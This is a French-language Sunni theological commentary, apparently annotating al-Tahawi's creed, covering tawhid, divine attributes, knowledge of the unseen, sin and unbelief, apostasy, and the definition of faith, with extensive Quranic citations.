    - « Allah est Le Créateur de toute chose. » (Sourate 39, verset 62).
    - « Votre Seigneur est certes, Allah qui a créé les cieux et la Terre en six jours, puis S'est Elevé sur le Trône; Administrant toute chose. » (Sourate 10, verset 3).
    Cette partie du Tawhid a été reconnue et confirmée par les polythéistes adorateurs des divinités bien que beaucoup d'entre eux ont démenti la Résurrection et le Rassemblement (des gens au Jour du Jugement Dernier). Mais cette seule foi au Tawhid de la Souveraineté Absolue, ne leur a pas permis d'entrer au sein de l'Islam, à cause   de leur association à Allah dans l'adoration, en particulier leur adoration des statues et idoles, jumelée à l'adoration d'Allah ; et à cause aussi de leur mécréance vis-à-vis de la mission du Messager, d'Allah, Muhammad (Saluts et Bénédictions d'Allah sur lui).
     B - La deuxième partie est celle du Tawhid de l'adoration que l'on nomme Tawhid de la Divinité. Il s'agit de l'adoration (d'Allah sans aucune association). C'est cette partie du Tawhid que les polythéistes ont reniée comme Allah le Très-Haut l'a dit en parlant d'eux :
    « Et ils (les Mecquois) s'étonnèrent qu'un avertisseur parmi eux leur soit venu, et les infidèles disent : "C'est un magicien et un grand menteur. Réduira-t-il les divinités à un Seul Dieu ? Voilà une chose vraiment étonnante." » (Sourate 38, versets 4 et 5).
    Il y a plusieurs versets similaires à celui-ci, prouvant la position de refus des polythéistes à l'égard de cette partie du Tawhid. Et cette dernière englobe la sincérité, l'exclusivité de l'adoration à Allah seul, la conviction inébranlable que c'est Allah Seul qui mérite cette adoration et que toute adoration de quelque chose que ce soit hormis Lui est vaine, nulle et non avenue. Ceci est en fait la signification de la première partie de la profession de foi: (La ilaha illa Llah c'est-à-dire (Point de divinité digne d'adoration hormis Allah), comme l'affirme Allah le Très-Haut :
    « C'est ainsi qu'Allah, Lui est le Vrai, alors que ce qu'ils invoquent en dehors de Lui est le faux. » (Sourate 22, verset 62).
     C - La Troisième partie est le Tawhid des Noms et Attributs d'Allah, cela signifie la foi à tout ce qui est mentionné dans le Saint Coran et la Tradition Authentique du Messager d'Allah (Saluts et Bénédictions d'Allah sur lui) comme Beaux Noms et Attributs Excellents et leur affirmation pour Allah Exalté soit-Il, selon la voie et la manière qui Lui conviennent, sans altération ni reniement ou négation. Et sans chercher a pénétrer leur comment ni à les comparer ou à les faire ressembler à ceux des créatures. Allah le Très-Haut a en effet dit :
    « Dis : "II est Allah, Unique, Allah le Seul (à être imploré pour tous les besoins). Il n'a point engendré et n'a point été engendré. Et nul n'est égal à Lui. » (Sourate 112)
    II a aussi dit :
    « Il n'y a rien qui lui ressemble; et c'est Lui l'Audient, le Clairvoyant. » (Sourate 42, verset 11). Il a dit encore :
    « C'est à Allah qu'appartiennent les Noms les plus beaux. Invoquez Le par ces Noms».30 Il a par ailleurs dit: «A Allah appartient le Qualificatif Suprême. » (Sourate 7, verset 180).
    Les versets relatifs à ce sujet sont très nombreux. Quant au Qualificatif Suprême, c'est celui qui ne renferme aucun défaut ni manque. Telle est la parole des gens de la Sounnah et de l'Unanimité, - concernant les Noms et les Attributs Divins - parmi les Compagnons du Messager d'Allah (Saluts et Bénédictions d'Allah sur lui), et ceux qui les ont suivis par le bien : ils font passer (transmettent) les versets et les Hadiths relatifs aux Beaux Noms et aux Attributs Divins, tels qu'ils sont mentionnés dans le Saint Coran et la tradition Prophétique. Ils confirment leurs sens sublimes à Allah, une confirmation indemne de toute ressemblance ou comparaison à ceux des créatures. Ils éloignent d'Allah Exalté soit-Il la ressemblance et la similitude à Ses créatures, sans pour autant nier Ces Noms et Attributs ni leurs sens. Les preuves claires du Saint Coran et de la Sounnah confirment fort bien leur parole-ci, et par conséquent leurs preuves prévalent et annulent celles des contradicteurs. N'est-ce pas à leur propos qu' Allah le Très-Haut a dit :
    « Les tous premiers croyants parmi les Emigrés et les Ansars (Auxiliaires) et ceux qui les ont suivis par le bien, Allah les agrée, et ils L'agréent. Il a préparé pour eux des jardins sous lesquels coulent les ruisseaux, et ils y demeureront éternellement. Voilà l'énorme succès. » (Sourate 9, verset 100).
    Qu'Allah nous compte parmi eux par Sa Grâce et Sa Générosité, certes Allah est Le Secoureur.
     2 - La parole de l'auteur (II est ancien (Prééternel) sans commencement) Ce terme (ancien) n'est pas mentionné parmi les plus beaux Noms d'Allah comme l'ont indiqué les savants dont le commentateur de ce livre, qu'Allah lui fasse miséricorde. Seulement beaucoup de dialecticiens théologiens l'ont mentionné afin d'affirmer l'existence d'Allah avant toute chose. Cependant les Noms d'Allah sont fixés par la loi Islamique, par conséquent, il n'est pas permis d'affirmer un Nom pour Allah excepté par le Grand Coran et l'Authentique Sounnah. Ainsi il n'est point permis d'affirmer un nom pour Allah par l'opinion comme l'ont stipulé les Imams de la Bonne Antériorité. Et le terme (ancien) n'a point le sens que veulent lui donner les dialecticiens car il signifie littéralement "Le Précédent à toute chose" même s'Il est précédé par le néant comme il en ressort de la Parole suivante d'Allah :
    « Et la lune Nous lui avons déterminé des phases jusqu'à ce qu'elle devienne comme la palme ancienne. ». (Coran : Sourate 36, verset 39).
    Donc, ce terme revêt le sens (littéral) vrai en plus de ce que l'auteur a éclairci : (ancien sans commencement). Cependant il ne convient pas de le compter parmi les plus beaux Noms d'Allah car il n'a point été rapporté par le Coran et la Sounnah. Et il suffit de mettre à sa place le nom d'Allah : le Premier comme Le Très-Haut a dit :
    « C'est Lui Le Premier et Le Dernier. » (Sourate 57, verset 3).
    Certes, c'est Allah qui fait réussir !
     7 - La parole de l'auteur: (Il transcende les limites, les finalités, les soutiens, les affiliations organiques, les matériaux, bref toutes les descriptions anthropomorphiques. Contrairement aux créatures, les six directions ne le contiennent pas). Ce dire est global, il se peut que les gens de l'interprétation et de l'athéisme à propos des Noms et des Attributs d'Allah, l'utilisent à leur fin, alors qu'ils n'y trouvent aucun argument favorable à leur dire, car le but de l'auteur, qu'Allah lui fasse miséricorde, est justement la purification de l'Inventeur (Allah) Exalté soit-Il de toute ressemblance aux créatures. Cependant l'auteur a exprimé cela par une expression générale qui a besoin d'être explicitée afin que disparaisse toute équivoque. Ainsi par le mot (limites) l'auteur veut dire les limites connues des humains (créatures). En effet Allah qu'il soit Exalté, nul en dehors de Lui ne connaît Ses limites, car les créatures ne peuvent point Le cerner de leur science comme II l'a affirmé (Exalté et loué soit-il) :
    « II connaît ce qui est devant eux et ce qui est derrière eux, alors qu'eux-mêmes ne Le Cernent pas de leur science. » (Sourate 20, verset 110).
    Quant à ceux qui ont parlé, parmi les Bons Prédécesseurs de la Oummah Islamique, des limites à propos de l'élévation d'Allah sur le Trône ou ailleurs ; ils veulent dire les limites qui sont connues d'Allah Seul exalté soit-Il, et qui échappent à la science des créatures. Quant au dire de l'auteur (...Les finalités, les soutiens, les affiliations organiques, les matériaux...) il vise par là, qu'Allah lui fasse miséricorde, la purification d'Allah de toute similitude aux créatures, dans Sa Sagesse et Ses Attributs Personnels tels que le Visage, la Main, le Pied et leurs semblables. Allah, qu'Il soit Exalté, est certes qualifié par tout cela, mais Ses Attributs ne sont point semblables à ceux des créatures et nul en dehors de Lui, ne connaît leur comment. Quant aux innovateurs religieux, ils utilisent généralement de tels termes pour nier les Attributs Divins en les remplaçant par des termes autres que ceux par lesquels Allah S'est qualifié et qu'Il a confirmé pour Son Saint Etre. Ils font cela afin de se dérober et d'éviter le discrédit des gens de la vérité. Quant à l'auteur At-Tahawy, Qu'Allah lui fasse miséricorde, il n'a nullement visé le but des innovateurs car il fait partie des gens de la Sounnah, ceux qui affirment pour Allah, Ses Attributs; ses propos dans cette lettre sur la croyance, s'expliquent les uns les autres, se confirment, les clairs expliquent les équivoques...
    La parole de l'auteur : (les six directions ne Le contiennent pas contrairement aux créatures), il signifie par-là les six directions créées et ne vise point la négation de la transcendance d'Allah ni la négation de Son Etablissement (Elévation) sur le Trône. Car ceci ne s'inclut pas dans les six directions. Allah est en effet au-dessus du monde et II le cerne. Allah Exalté soit-Il a créé Ses serviteurs en leur inculquant la foi naturelle innée en Sa Transcendance et avec la compréhension innée qu'Il se trouve au niveau Sublime (le plus haut). Les gens de la Sounnah et de l'Unanimité, en l'occurrence les compagnons du Prophète (Saluts et Bénédictions d'Allah sur lui), et ceux qui les ont suivis sur la bonne voie, sont d'avis commun sur la Transcendance Divine. Les preuves du Saint Coran et de la Sainte Tradition montrant le caractère Transcendantal d'Allah sont très Nombreuses. Sois donc très attentif, cher lecteur à cette question très importante et sache qu'Allah est la Vérité et tout hormis Lui est faux et vain. Certes c'est Allah qui fait réussir.
     10 - L'auteur, qu'Allah lui fasse miséricorde, veut dire par (une science qui échappe aux créatures) la science du mystère. Une science propre et spécifique à Allah Seul Exalté et Loué soit-Il. Quiconque parmi les hommes prétend détenir cette connaissance devient mécréant à cause des saintes paroles suivantes d'Allah :
    « C'est  Lui  (Allah)   qui   détient  les   clefs   de l'Inconnaissable. Nul autre que Lui ne les connaît. » (Sourate 6, verset 59).
     « Dis : Nul  de ceux qui sont dans les deux et sur la terre ne connaît l'Inconnaissable, à part Allah. » (Sourate 27, verset 65).
    Et à cause également de la sainte parole du Prophète (Saluts et Bénédictions d'Allah sur lui) : « Les clés du mystère sont au nombre de cinq. Nul ne le connaît hormis Allah, puis il récita la Sainte Parole suivante de Dieu : « Certes la connaissance de l'Heure est auprès d'Allah, et c'est Lui qui fait tomber la pluie salvatrice, et II sait ce qu'il y a dans les matrices. Et personne ne sait ce qu'elle acquerra demain, et personne ne sait dans  quelle  terre   il mourra. Certes Allah est Omniscient, Parfaitement Connaisseur. » (Sourate 31, verset 34).
    Les Hadiths authentiques relatifs à ce sujet sont très nombreux et montrent tous que le Prophète (Saluts et Bénédictions d'Allah sur lui), ne connaît pas le mystère malgré qu'il est la meilleure des créatures, et le Chef des Messagers. Que dire alors de quelqu'un d'autre que lui ? Le Prophète (Saluts et Bénédictions d'Allah sur lui) ne connaît en effet du mystère que ce qu'Allah l'Exalté a voulu lui enseigner. C'est ainsi que lorsque les menteurs ont tenté d'entacher l'honneur de 'Aicha, qu'Allah soit satisfait d'elle, le Prophète (Saluts et Bénédictions d'Allah sur lui) n'a pu savoir son innocence qu'avec la descente de la Révélation Coranique. De même quand la chaîne d'Aicha fut perdue au cours d'un de ses voyages, le Prophète (Saluts et Bénédictions d'Allah sur lui), chargea un groupe de ses compagnons pour la chercher. Il n'a pas pu où se trouvait la chaîne, jusqu'au moment où l'on fit déplacer le chameau. Après quoi la chaîne qui était au-dessous du chameau fut retrouvée. Les arguments du Saint Coran et la Sainte Tradition sur le sujet sont très multiples et à Allah la louange.
     13 - Le propos de l'auteur : (Nous ne traitons personne parmi les gens de la Qibla, ceux qui prient la prière musulmane en s'orientant vers la Sainte Ka'ba à la Mecque de mécréant pour un péché qu'il commet à moins qu'il ne le considère comme licite) ; l'auteur qu'Allah lui fasse miséricorde, veut dire par ce propos que les gens de la Sounnah et de l'Unanimité ne traitent pas de mécréant le musulman monothéiste qui croit en Allah et au Jour Dernier pour un péché qu'il commet tels que : l'adultère, la consommation d'alcool, l'usure (le prêt à intérêt), la désobéissance aux deux parents mère et père..., à moins qu'il ne considère ce péché comme étant licite. En effet s'il traite le péché de licite (permis), il devient alors mécréant car il a démenti Allah et Son Messager, par conséquent il sort du cercle de l'Islam.
    Mais s'il ne rend pas licite le péché, il n'est pas mécréant chez les gens de la Sounnah et de l'Unanimité. Sa foi est plutôt faible et il doit subir la peine de ce qu'il a commis comme péché par perversité. De même il encoure l'application des prescriptions Islamiques conformément à la loi Islamique en vigueur. Tel est l'avis des gens de la Sounnah et de l'Unanimité, concernant le musulman qui commet un grand péché comme cité ci haut, contrairement aux sectes Islamiques égarées tels les Khawarijs et les Mou'tazilites et ceux qui les auront suivis dans leur mauvais chemin. Les Khawarijs en effet traitent de mécréant tout croyant qui commet des péchés alors que les Mou'tazilites considèrent le croyant pécheur dans une position intermédiaire entre deux positions, c'est-à-dire entre l'Islam et la mécréance dans ce bas monde; mais quant à son état dans l'au-delà, les Mou'tazilites s'accordent avec les Khawarijs pour dire que le croyant pécheur s'éternisera dans le feu de l'enfer. Et le propos de toutes les deux sectes est sans doute faux et contraire au Coran et à la Sounnah et au consensus des bons prédécesseurs de cette Oummah. Certes leur propos-ci a causé une certaine équivoque à certains musulmans à cause de leur peu de connaissance, car c'est un propos clair dans sa fausseté pour les gens de la vérité comme nous venons de le montrer. Certes c'est Allah qui fait réussir.
    14 - L'auteur, qu'Allah lui fasse miséricorde, veut dire par-là que nous n'affirmons pas (ou ne témoignons pas de) leur entrée au Paradis, hormis ceux pour qui l'Envoyé d'Allah prière et salut d'Allah sur lui a témoigné tels que les dix compagnons promis au Paradis et leurs semblables comme l'auteur évoquera cela à la fin de son propos. Il faut savoir cependant qu'il fait partie de la croyance des gens de la Sounnah et de l'Unanimité le témoignage que tous les croyants et les pieux de façon générale sont des gens du Paradis, et le témoignage que tous les mécréants, les polythéistes et les hypocrites (qui meurent sans se repentir) sont généralement des gens de l'Enfer. Ceci est bien prouvé par les nobles versets du Saint Coran ainsi que l'authentique Sounnah prophétique tant répandue et reçue de Muhammad (Saluts et Bénédictions d'Allah sur lui). On citera à titre d'exemples les Saintes Paroles d'Allah suivantes :
    « Certes les pieux seront dans des jardins et dans des délices. » (Sourate 52, verset 17).
    « Aux croyants et aux croyantes, Allah a promis des jardins sous lesquels coulent les ruisseaux pour qu'ils y demeurent éternellement. » (Sourate 9, verset 72).
    Il y a sans doute de nombreux versets qui vont dans ce sens concernant les croyants.
    Quant aux mécréants, Allah exalté soit-Il a dit à leur propos :
     « Et ceux qui ont mécru auront le feu de l'Enfer : on ne  les achève pas pour qu'ils meurent ; ont ne leur allège rien de ses tourments. C'est ainsi que nous récompensons tout négateur obstiné. » (Sourate 35, verset 36).
     « Les hypocrites seront, certes, au plus bas fond du Feu, et tu ne leur trouveras jamais de secoureur. » (Sourate 4, Verset 145).
     15 - Cette restriction est discutable car le mécréant entre dans l'Islam par la profession de deux témoignages s'il ne les professait pas auparavant. Mais s'il les professait auparavant, il entre dans l'Islam par le repentir, en se repentant de ce qui a causé son apostasie. Et il peut sortir de l'Islam pour plusieurs raisons autres que la négation de ce qui l'a fait entrer dans l'Islam, comme l'ont expliqué les savants au chapitre du renégat. Parmi ces raisons : le fait d'attaquer l'Islam ou le Prophète (Saluts et Bénédictions d'Allah sur lui), se railler (se moquer) d'Allah Exalté soit-Il, vu la déclaration suivante d'Allah : « Et-ce d'Allah, de Ses versets (le Coran) et de Son Messager que vous vous moquez? Ne vous excusez pas: vous avez bel et bien rejeté la foi après avoir cru. » (Sourate 9, verset 66).
    Il fait partie aussi des causes qui font sortir de l'Islam : l'adoration des statues et des divinités, l'imploration des morts, la demande de leur secours, la recherche de l'assistance et de l'aide auprès d'eux... Car tout cela contredit la profession de foi : "La ilaha illa Llah" (point de divinité digne d'adoration hormis Allah). Cette profession de foi implique qu'Allah seul mérite l'adoration. De même, font partie des facteurs qui annulent l'Islam : l'invocation, la recherche du secours, l'inclinaison, la prosternation, le vœu... adressés à autre chose qu'Allah. Quiconque destine (voue) une adoration parmi celles citées ci haut à autre chose qu'Allah tels que les statues, les idoles, les anges, les djinns, les morts... celui-là a sans doute pratiqué la grande association à Allah et n'a point réalisé le sens de la profession : "Point de divinité digne d'adoration hormis Allah." Et toutes ces adorations font sortir de l'Islam celui  qui les pratique, par unanimité des savants musulmans ; et pourtant elles ne sont pas relatives à la négation de ce qui fait entrer dans l'Islam ; et leurs arguments sont bel et bien connus du Saint Coran et de la Sainte Sounnah. Il y a bien d'autres facteurs qui font sortir de l'Islam et qui ne sont pas corollaires (relatifs) à la négation de ce qui fait entrer à l'Islam. Les savants musulmans les ont exhaustivement énumérés au chapitre du renégat, auquel on peut se référer si besoin est. Certes, c'est Allah qui fait réussir.
     16 - Cette définition de la foi est discutable car elle est défectueuse. En effet, la vraie et complète définition approuvée par les gens de la Sounnah et de l'Unanimité est la suivante : la foi est parole, action et croyance. Elle augmente avec l'obéissance et diminue avec la désobéissance. Les preuves sur cela sont tellement diversifiées qu'il n'est pas possible de les cerner toutes, se référer si besoin est à celles citées par Aboul-‘Iz dans son commentaire de ce livret. Et l'exclusion de l'action de la définition de la foi est le propos tenu par les Mourji-a (les espérants) qui sont une secte Islamique, qui prétend que le péché ne nuit pas en présence de la foi et que cette dernière se trouve seulement dans le cœur. La différence entre eux et les gens de la Sounnah n'est pas seulement une différence littérale ; mais c'est une différence à la fois littérale et conceptuelle. Et plusieurs déductions juridiques y sont relatives comme cela apparaîtra à quiconque médite les propos tenus par les deux parties. Qu'Allah nous assiste !
     17 - Le propos de l'auteur "la foi est identique et les croyants sont à l'origine identiques" est un propos injuste mais plutôt faux car les croyants ne sont pas identiques dans leur foi, mais ils se surpassent d'un grand pas. Ainsi la foi des Messagers d'Allah (Paix sur eux) n'est pas comme la foi des autres hommes, tout comme la foi des califes (successeurs bien guidés du Prophète (Saluts et Bénédictions d'Allah sur lui)) et du reste des compagnons, qu'Allah les agrée tous, diffère de celle des autres hommes. De la même façon la foi des croyants pieux n'est pas comme celles des pervers. Et ce surpassement se fait en fonction de ce qu'il y a dans le cœur comme connaissance d'Allah, de Ses plus beaux Noms, de Ses Attributs, de Sa loi légiférée pour les serviteurs, telle est la parole des gens de la Sounnah et l'Unanimité, contrairement à celle des Mourji-a et de ceux qui s'accordent avec eux. Qu'Allah nous assiste!
     20 - Ceci est incorrect et faux, mais bien plutôt les serviteurs "chargés" peuvent beaucoup plus qu'il ne les a chargés, Exalté soit-Il. Cependant Allah Loué soit-Il a allégé les charges pour Ses serviteurs par compassion et leur a facilité les tâches sans leur imposer aucune gène dans leur religion, par grâce et bienfaisance (bonté) de Sa part. Certes, c'est Allah qui fait réussir.

      La date/heure actuelle est Lun 28 Mai - 0:27